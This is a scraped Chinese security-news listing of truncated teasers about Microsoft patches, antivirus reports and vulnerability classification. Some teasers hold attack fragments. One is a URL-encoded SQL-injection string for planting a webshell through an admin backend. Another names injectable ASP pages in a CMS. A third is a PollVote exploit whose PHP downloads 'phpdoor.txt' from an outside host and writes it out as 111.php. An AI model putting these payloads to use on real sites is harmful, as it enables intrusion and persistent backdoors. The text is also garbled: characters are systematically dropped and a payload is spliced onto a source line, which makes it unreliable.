下周二微软就要发布4月份安全补丁了，今天，微软放出了安全公告预告。4月份，微软将发布17个安全补丁，其中9个位最高的严重级别，另外8个为重要级别，修复 Windows、Office、IE、Visual Studio、.NET Framework和GDI+中的64个漏洞。 微软表示，4月份发布的补丁将修复在2月15日公开披露的SMB浏览器问题（严重等级漏洞）。微软评估并且报告了这个问题，尽管这个安... [阅读全文]

据金山发布的《2008年上半年中国电脑病毒及互联网安全报告》显示，漏洞已经成为电脑病毒传播的主要途径之一。据了解，微软本月发布的安全补丁多达11款，用来修复26个漏洞，创近两年补丁数量之最。虽然各大杀毒软件以及安全辅助软件都具备漏洞修复功能，然而由于广大用户对漏洞危害的认识不够，以及安全软件在漏洞修复过程中存在下载速度慢等问题，导致大量用户的电脑内存在安全漏洞，为电脑安全埋下隐患。 　　金山清理专... [阅读全文]

文章来源:安全中国%3D%40%40%76%65%72%73%69%6F%6E%2B%61%6E%64%2B%27%27%3D%27&admininfo%5Flogpassword=4&admininfo%5Fadmin=1&admininfo%5Flogin=3&admininfo%5Floginname=1;") 后台写WEBSHELL 逻辑过滤方式: admin_up.asp 引用内容: ... [阅读全文]

user目录下Article.asp code:Dim ArticleTitle,AuthorName,CopyFrom,Editor,KeyWord,IsHot,IsTop,IsElite,yn,Content,ReadLevel,ReadPo,VIPReadPo,PaginationType,MaxCharPerPage,ClassID,IncludePic,IndexPicUrl,HitsD... [阅读全文]

这个不用我说了吧！他注入漏洞在马骏blog 上发过 个是 在:user目录下soft.asp 和 ShowInfo.asp 都有注入漏洞！我今天发现注入漏洞 也是在user目录下 RegPost.asp 文件出现漏洞！这个是注册页面！下面是code:dim rs,sql,MyUserInfo‘定义些变量dim UserName,UserPassWord,UserSex,UserQuestion,U... [阅读全文]

近段时间来360安全卫士出尽风头已经成为“装机必备”而且其版本更新非常频繁短短个星期的内更新多达6次以上!近日其1.7最新版本发布其中将给网民带来什么样惊喜呢?　　、键搞定所有系统安全漏洞　　从360安全卫士站点更新日志中我们发现V1.7新增了个“漏洞修复”功能下载并运行的后切换到“诊断及修复”标签这里多出了个“漏洞扫描”菜单　　点击该菜单瞬间这里列出了当前系统存在所有安全隐患并对其安全等级进行评... [阅读全文]

写本文目地是为了整理总结些东西解决在试图构造个漏洞数据库过程中碰到主要问题也就是如何对计算机网络漏洞进行分类问题文中些想法并不成熟有些甚至连自己也不满意权作抛砖引玉以期和在这方面有深入研究同仁交流共同提高完善 个计算机网络安全漏洞有它多方面属性我认为主要可以用以下几个方面来概括:漏洞可能造成直接威胁漏洞成因漏洞严重性漏洞被利用方式以下讨论将回绕这几个方面对漏洞细分其类 A．按漏洞可能对系统造成... [阅读全文]

转自:重庆网安联盟 公司有台安装在Windows 2000 Server上SQL Server 2000数据库服务器由于仅仅是作为数据库服务器用平时甚少登录桌面即使有登录为了更好安全性也都是用另个专门创建低权限账户进入桌面正因如此天长日久倒搞忘了本机管理员密码由于些原因这台服务器也没加入域所以也不能指望用域管理员账户登入但今天又必须用管理员用户登录进行些操作该如何办呢?以前也曾听过很多种... [阅读全文]

PollVote是个投票系统今天看了非安全杂志看了利用思路方法不过作者说利用过程时候很烦琐关键时候又没介绍说明白简单说下``首先建立2个文本 分别是creatfile.txt和phpdoor.txtcreatfile.txt内容写?$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");$ff=fopen("111.php","a")... [阅读全文]

软件Software安全性看起来越来越严重了方面黑客利用软件Software漏洞引起安全事件数量越来越呈上升趋势另方面软件Software公司推出补丁数量也呈上升趋势尽管有些补丁是为加强软件Software功能而推出但大部分补丁却是针对软件Software漏洞补丁多么恰当称呼！　　虽然补丁数量越来越多但安全性却没有明显提高主要原因如下:　　、有些软件Software补丁并不是那边容易就"补上去"即... [阅读全文]